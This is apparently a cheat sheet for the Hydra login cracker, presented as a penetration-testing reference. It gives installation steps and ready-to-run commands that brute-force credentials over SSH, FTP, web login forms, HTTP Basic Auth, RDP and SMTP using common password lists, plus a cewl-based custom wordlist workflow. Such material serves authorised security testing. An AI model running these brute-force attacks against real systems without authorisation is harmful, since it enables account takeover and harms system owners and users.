Description
Hydra is a fast, parallelized login cracker that supports numerous protocols including SSH, FTP, HTTP, HTTPS, SMB, and many more. It's essential for brute-forcing credentials during penetration tests.
Installation
BASH
# Kali (pre-installed)
hydra -h
# Debian/Ubuntu
sudo apt install hydra
# macOS
brew install hydra
# From source
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra && ./configure && make && sudo make installBasic Usage
BASH
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
# FTP brute force
hydra -l admin -P passwords.txt ftp://target.com
# HTTP POST form
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"Advanced Usage
BASH
# Multiple usernames
hydra -L users.txt -P passwords.txt ssh://target.com
# Specific port
hydra -l admin -P passwords.txt -s 2222 ssh://target.com
# Limit threads
hydra -l admin -P passwords.txt -t 4 ssh://target.com
# HTTP Basic Auth
hydra -l admin -P passwords.txt target.com http-get /admin
# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com
# SMTP brute force
hydra -l user@target.com -P passwords.txt smtp://target.com
# Resume interrupted attack
hydra -R
# Verbose + output
hydra -l admin -P passwords.txt ssh://target.com -V -o results.txtCommon Workflows
BASH
# Web login brute force with custom wordlist
cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt
hydra -l admin -P custom_wordlist.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"
# SSH with common creds
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt ssh://target.com